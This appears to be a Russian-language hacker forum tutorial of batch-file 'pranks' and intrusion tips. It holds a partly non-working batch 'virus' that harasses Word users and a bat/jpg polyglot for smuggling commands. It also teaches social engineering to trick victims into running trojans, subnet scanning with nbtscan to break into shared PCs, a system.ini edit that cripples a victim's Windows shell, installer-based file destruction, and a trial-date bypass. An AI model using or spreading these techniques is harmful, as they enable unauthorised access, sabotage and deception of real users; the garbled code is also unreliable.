..попробуем заразить какую-либо программу! В качестве жертвы я выбрал - ворд!

Составим алгоритм:

1. Ищем жертву в процессах
2. При обнаружении, передаём управление жертвой - вирусу (метка :glum)
3. Глумимся как можем над юзером
4. Юзер "сдаётся" и закрывает заражённую программу
5. Переходим к первому пункту...

@echo off
:findopen
if exist (
'TaskList /NH /FO CSV /FI "WINDOWTITLE eq Microsoft Word"^|Find /I "winword.exe"'
) goto go

ping -n 10 127.0.0.1 > nul goto :findopen

:go
rem тело вируса
:glum
rundll32 user,setcursorpos(random(800),Random(600))
rundll32 user,getwindowrect(GetForeGroundWindow,rect)
rundll32 user,setwindowpos(GetForeGroundWindow, HWND_TOPMOST,rect.left+1,rect.top+1, rect.left+45,rect.left+45)
rundll32 user,SwapMouseButton

ping -n 5 127.0.0.1 > nul goto :glum

if closewindow "WINDOWTITLE eq Microsoft Word" goto :findopen

..прошу обратить внимание на раздел – глумление над пользователем (:glum), который работает с зараженной прогой. Мы просто берем и дергаем мышку, а окно самой нужной программы уезжает влево и вниз. Для извращенцев – можете поменять параметр ping (5).

Программа для удаления файлов по маске. Ищет на всём диске указанные типы файлов:

@echo
title Удаление файлов по маске
cls
echo.
echo Идёт удаление временных файлов на диске С:\. Пожалуйста ждите....
echo.
echo Список удалённых файлов
echo *******************************
echo.
rem ключ /s - удаляет файлы из всех подкаталогов
del /f /s /q C:\*.tmp
echo.
rem делаем паузу, чтоб заглянуть "в топку"
pause

echo.
echo Идёт удаление файлов на диске D:\. Пожалуйста ждите....
echo.
echo Список удалённых файлов
echo *******************************
echo.
del /f /s /q D:\*.tmp
echo.
pause

Периодически сворачиваем все окна.

@echo
cls
:go
echo.
echo .:: Окна - отстой, командная строка - руль! ::.
echo.
ping -n 5 127.0.0.1 > nul

"%APPDATA%\Microsoft\Internet Explorer\Quick Launch\Свернуть все окна.scf"
ping -n 20 127.0.0.1 > nul goto go

Добавляем "N" папок в меню "Отправить":

cd %USERPROFILE%\SendTo
md 1
mp 2
md 3
...
md n

Скрипт выводит окно (по средствам Java Script) с твоим сообщением и кнопкой ОК

echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("твой_текст"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js

Пример изменения текущей даты и восстановления её после запуска приложения. (может быть полезно, если приложение "trial" и срок демонстрациии закончился):

set tempdate=%date:~-10%
date 01-01-01
start триал-прога.exe
date %tempdate%

Как отправить сообщение из bat-файла?

net send [name] [Message text]

...где [name] - имя машины или пользователя, которому адресуется сообщение, а [Message text] - текст сообщения.

Батник, который будет в текстовых файлах заменять символы "а" на "b". (setlocal/?)

@Echo Off
rem папка с txt-файлами
Set Source=C:\Temp
SetLocal EnableDelayedExpansion

For %%A In ("%Source%\*.txt") Do (
For /F "Tokens=1* Delims=:" %%B In ('Type "%%A"^|Findstr /IN "$"') Do (
Set Str=%%C
If "!Str!"=="" (
Echo.>>"%%A_tmp"
) Else (
Set Str=!Str:a=b!
Echo !Str!>>"%%A_tmp"
))
Move /Y "%%A_tmp" "%%~fA"
)
EndLocal

Задумал такую "вещь"....

@echo off
if exist *.jpg goto go

:go
md tmp\result
copy *.jpg tmp

echo. >tmp\result\%date%.jpg
echo ==================================>>tmp\result\%date%.jpg
echo. >>tmp\result\%date%.jpg
echo @echo>>tmp\result\%date%.jpg
echo Hello, TGSA!>>tmp\result\%date%.jpg
echo. >>tmp\result\%date%.jpg
echo ==================================>>tmp\result\%date%.jpg
echo. >>tmp\result\%date%.jpg

type tmp\*.jpg>>tmp\result\%date%.jpg
cls

1. При запуске bat-файла происходит поиск жертвы (*.jpg)
2. Создаются две временные папки (..\tmp\result)
3. Жертва копируется в директорию tmp
4. Пишем текст bat-файла и перенаправляем его в картинку ..\tmp\result\дата.jpg
5. Раскрываем (type/?) jpg-жертву из папки temp в досовском окне, и ДОписываем его в ..\tmp\result\дата.jpg
6. Получили "гибрид" bat/jpg в одном файле (дата.jpg)

... открываем гибрид в блокноте и видим вот что:

==================================
@echo
Hello, TGSA!
==================================

яШяа JFIF
 d d ям Ducky
 0 яо Adobe dА
яЫ „
&&&&&++++++++++
 
$$#$$++++++++++яА 
4 ъ
" 

яД Ј












 

 !1AQ"aq2ЃЎB#‘±RБСb3сr‚C$рб’ўІВSѓ
T”¤Д%& 



!1AQaq"2ЃR3Ў±БB#яЪ 

? ЬiJPR””Ґ Ґ)@)JPR”•њ¬K€ОМЇђ¦b`Ь7юS^E
ЧТыЄ">кЖ‹/ Eї&)¤ТЧrSўѕ%Їа*$zб›‘—н“‹"А5iЈґЃG‰eOUѕКЌ‹њ›ф±¦
Ѓе`Т:LД2©bSqЬЈҐл‚nи—ђЗЃ°eW$И™ёИ6И®џтUї0\лЇВ’ ґC›‹4-R‰.YµЫЦалб_щЙ/
o‘ўв†Ы›ЌЪЃ»а/U№Ы;уўДЌ0І$

...все эти телодвижения лишь для того, чтобы внедрить командные строки батника - в картинку, т.е. использовать фото в качестве "бандероли с bat-файлом". Следующим этапом будет извлечение (на машине жертвы) командных строк из заражённой картинки в bat-файл командой FOR /F "skip=n". (for/?)

Eсли переименовать этот "гибрид" в *.bat, то получим готовый батник с вложенной картинкой, которую можно извлечь и вывести на экран. Почва для размышления...

@echo off goto go = Социальная инженерия = Для чего применяют социальную инженерию (СИ)? ..для манипулирования человеческим разумом! Человек (далее юзер) - брешь в системе безопасности, причём взломать его мозг порой легче чем его аккаунт. Но не всё так просто. Сейчас у многих - заметно вырос мозг! Они постоянно находятся в напряжении и трясутся над своими аккаунтами, их самих нередко разводили и они набрались опыта. === Способы манипулирования сознанием юзеров === 1. ДОВЕРЧИВОСТЬ. ..выявляется при обычной переписке. Основываясь на доверчивости совершаются обманы всех мастей (в том числе и крайне нелицеприятные). Сомнительные сделки со смутным условием "как есть" - понятно чем закончатся. Это единственный вид СИ, пользуясь которым вы не заслужите ничего, кроме откровенного презрения, бана, занесения ваших данных в "BlackList". 2. ГЛУПОСТЬ. Ну, тут всё просто... Тут даже способ с тех.поддержкой подействует. Жертва доверяет вам по причине своего однобокого мышления. В особо тяжёлых случаях наблюдается полное незнание русского языка. ГЛУПОСТЬ очень распространена в интернете. Зайдите на какой нибудь популярный чат для обычных юзверей и убедитесь в этом. 3. ПОВЫШЕННАЯ САМООЦЕНКА. Жертва слишком высокого мнения о себе. Если удасться уязвить её самолюбие, то она (в припадке злости) не почует никакого развода. Люди с подобным недостатком доведённые до кондиции, запустят любую прогу, сболтнут о себе конфиденциальной инфы, лишь бы не терять свой мнимый авторитет. Нужно только хорошо постараться. 4. ЖЕЛАНИЕ ПОМОЧЬ. Очень действенный способ. Прикинувшись ламаком слёзно просите жертву о помощи, намекая на "её профессиональность". Жертва с радостью кинется помочь... запустив трояна или перейдя по ссылке. 5. НЕОЖИДАННОСТЬ. Действует это так... Посылаеш жертве послание с вложенным трояном и потом тут же жалобное письмо "Ой, нет это не тебе, ошибся. Пожалуйста, удали это письмо". Жертва, не ожидающая никакого развода, полезет смотреть на вложение.. Желательно вместе с архивированным троем посылать какую-нить занимательную картинку или музон. Так же юзеры неплохо ведутся на всякого рода опросы. 6. ЗНАКОМСТВО. Жертва доверяет в интернете только знакомым. Какая ошибка... Притворитесь противоположным полом, поболтайте с ней несколько дней, разузнайте, что надо, и под конец - впарьте троя. В общении не рекомендуется акцентировать своё внимание на одной теме. === Развод === Вот вы занимаетесь СИ, всё ОК, ломаются чужие компы... А вы когда нибудь задумывались о том, что и вы можете стать типичной жертвой ещё более продвинутых хитрецов? Может вы подсознательно ведётесь на один из способов, перечисленных выше? Тогда следующая инфа для вас! Всегда смотрите на истинный адрес, по которому собираетесь направиться. Какого-нить трояна, залитого под видом полезной проги может расхваливать целая армия посетителей. Имеёте ввиду, что все ники могут принадлежать одному и тому же лицу - хозяину троя. Как говориться, доверяй - но проверяй. Поверьте, вас могут очень коварно развести, полагаясь на особенности психики. И убеждение типа "...меня никому не провести!!!" - не самая лучшая тактика. === Как расколоть кидалу === Пример разоблачения хозяина троя. Качаем "Vmware", создаём новую виртуальную машину. Перед нами полноценная эмуляция второго компьютера. Попадается возможный распространитель троев - смело скачиваем предложенную им прогу и запускаем её на виртуальной машине и перехватываем сниффером весь траффик в течении нескольких минут. Смотрим на результат - ищем адрес "smtp-сервера" и мыло, на которое трой отправил данные. Полезных сведений собрать неудасться, ведь запускался трой на виртуальной винде. Пишем горе-хацкеру на ящик письмо, мол "..не по Хуану самбреро!" и какой он 3,14нздюк!!! :go END

Как попасть на чужую тачку?

1. Нужно узнать IP своего провайдера. Для этого жмём на двух мониторах в трее и переходим на вкладку "Сведения".

2. Качаем прогу nbtscan (желательно под дос).

3. Во время коннекта в командной строке пиши nbtscan.exe -t 50 xxx.xxx.xxx.0-255, где xxx.xxx.xxx. - первые три числа IP твоего прова, 0-255 - количетво сканируемых машин, -t 50 - время сканирования, дави ENTER. Теперь видишь всех юзерей, подключенных к провайдеру. Взломать можно не всех, а лишь тех, кто с пометкой сервер (SERVER). Если ввести "nbtscan" без параметров, то увидиш хелп в котором указаны примеры команд.

4. Дальше жми [ПУСК=>НАЙТИ=>КОМПЬЮТЕР] и пиши ай-пи адреса этих "меченых" юзеров. Когда находишь юзера в поле "найти компьютер" ты буришься к нему на комп.

...мы на машине жертвы! Теперь быстро определяемся, что делать.. Может оставить где-нибудь надпись: "Свободу Кевину Митнику"? Но его уже освободили... А может удалить все файлы? Тогда придется иметь дело с милицией (она будет искать не тебя, а человека который тебя застрелил). Когда ты на компе ламера, ты должен оставить достойный след своего присутствия!

У тебя, наверно, чешутся руки стереть что-нибудь. Если я прав, то ты самый настоящий ЛАМО. Мой "спиногрыз" ито более прикольные вещи выкидывает, а жена потом их стирает, ..только не кнопкой Delete, а ручками в стиральной машине. Файлы нужно не удалять, а переименовывать или изменять!

"Большой Билли" навешал лапши, что "system.ini" и "win.ini" только для совместимости. Докажем обратное! В папке Windows валяется system.ini. Допишим в него строки...

@echo off
rem переходим в папку windows
cd %windir%
rem делаем резервную копию
type system.ini > system.bak
rem дописываем строки
echo [boot] >> system.ini
echo shell=notepad.exe >> system.ini
cls
rem ..таблЭтка - explorer.exe, вместо notepad.exe

После перезагрузки на компе жертвы появятся пустые обои (без панели и кнопки "Пуск") и запустится только Блокнот. Больше ничего запустить с такой системы нельзя! Мы превратили машину Intel - в печатную машинку. Любая жертва будет довольна твоей сообразительностью, а главное, что больше этот комп никогда не зависнет.

CreateInstall - помощник западлостроителя!

Самое простое - это запаковать в инсталлер трояна и в конце установки предложить запустить его, или же создать в меню "пуск" ярлычок с красивой иконкой. Все для удобства пользователя!

Но троян - это прозаично, а ведь можно придумать что-нибудь повеселее, ведь в процесс установки можно добавлять различные макросы, типа создания/удаления директорий, внесения изменений в реестр и т.д. Вот с этим и можно поприкалываться!

Смело жмешь "Сценарий установки" и выбираешь там то, что будешь ампутировать жертве. Количество вариантов ограничено только твоей фантазией. В качестве мелкой пакости можно стереть все ярлыки из главного меню, в качестве большой подлянки - директорию Windows. Никто не помешает тебе подправить win.ini на свое усмотрение.

Ты сможешь забить вражеский винт всяким дерьмом по самые уши используя copy action. В конце установки можно предложить низкоуровневый формат всех дисков, включая сетевые. Это точно твой случай!

..защита??? А ее нет! Конечно, если ты в "setup" впаяешь трояна, то AVP его рюхнет, а вот если будешь делать гадости через сам сетап, то ни один антивирус ничего не унюхает.

Знай законы, которые ты нарушаешь!

Тебе, вирмейкер
..творец коня-убийцы, прущего пороли пачками, форматирующего винты, уничтожающего сети. Если докажут, что этот зверь - твой питомец, то на тебе висит статья 273 УК РФ (Создание и распространение вредоносных программ для ЭВМ). Тебя сразу лишат невинности, т.е. посадят на срок до 3 лет, плюс возьмут штраф 200-500 минималок. Если твой вирь замочил тучу систем и принес ущерб на многие пачки баксов, то мотать тебе от 3 до 7 лет.

Вот ещё одна зараза!

При запуске без параметров эта команда выдаст список логических дисков, вместе с назначенными им буквами или точками подключения:

C:\>mountvol
Создание, удаление и просмотр точек подключения.

MOUNTVOL [диск:] "путь" "имя тома"
MOUNTVOL [диск:] "путь" /D
MOUNTVOL [диск:] "путь" /L

/D    Удаление точки подключения тома из заданной папки.
/L    Вывод списка имен подключенных томов для заданной папки.

Возможные значения имени тома вместе с текущими точками подключения:

\\?\Volume{f5c4dd11-417a-11e0-aff0-806d6172696f}\
   C:\

\\?\Volume{f5c4dd12-417a-11e0-aff0-806d6172696f}\
   D:\

\\?\Volume{f5c4dd10-417a-11e0-aff0-806d6172696f}\
   E:\

\\?\Volume{f6facdaa-5abf-11e0-ae86-84ec20fa68d1}\
   A:\

Для размонтирования диска (удаления буквы) достаточно вызвать "mountvol" с ключом /D, и буквой удаляемого диска. Диск - тут же исчезнет из "Моего компьютера", хотя к нему можно будет обратиться по его идентификатору. Все данные при этом сохраняются, а исчезает только буква диска:

mountvol D: /D

Хорошо! Диск "D:" успешно удален. Остается только разобраться, как вернуть его обратно! Вызываем "mountvol" с идентификатором логического диска и буквой, которую мы собираемся ему присвоить. Для этого запускаем утилиту mountvol.exe без ключей и она выводит список всех идентификаторов, причем рядом с идентификатором, которому не присвоена ни одна буква, будет торчать надпись "нет точек подключения". Копируем и вставляем его в командную строку следом за командой:

mountvol D: \\?\Volume{f5c4dd12-417a-11e0-aff0-806d6172696f}\

Как мы видим, диск "D:" исправно появляется в "моем компьютере" и в прочих местах! Кстати, этим трюком можно прятать и папки с файлами, но для этого придётся заранее подготовить один раздел, который в последствии будет использоваться как сейф. Тогда отпадёт потребность в таких программах как HidesFiles, LockFolders, EasyFile и т.п.

rem размонтируем D:
mountvol.exe D: /D
rem монтируем логический диск на каталог C:\NUDE
mountvol.exe C:\NUDE \\?\Volume{f5c4dd12-417a-11e0-aff0-806d6172696f}\

Защита от вторжения

Однако с легальными программами произойдет то же самое, поскольку они определяют имя командного интерпретатора по переменной COMSPEC, а она по умолчанию указывает на C:\WINDOWS\System32\cmd.exe.

Но это тоже поправимо! Обзываем "cmd.exe" в "hacker.exe", соответствующим образом скорректировав переменную COMSPEC: [Win+Break]-->Дополнительно-->Переменные среды-->COMSPEC-->Изменить:

Теперь напишем коротенькую программу, выводящую на экран предупреждение о хакерском вторжении и (!)переименуем ее в "cmd.exe".

При всей своей простоте предложенный прием необычайно эффективен. Хакеры и сетевые черви практические никогда не анализируют переменную окружения COMSPEC. Вместо этого - командный интерпретатор вызывается по его исходному имени cmd.exe, позволяя тем самым обнаружить атаку на самых ранних стадиях проникновения!

Удачных атак и веселых развлечений на ламерских тачках!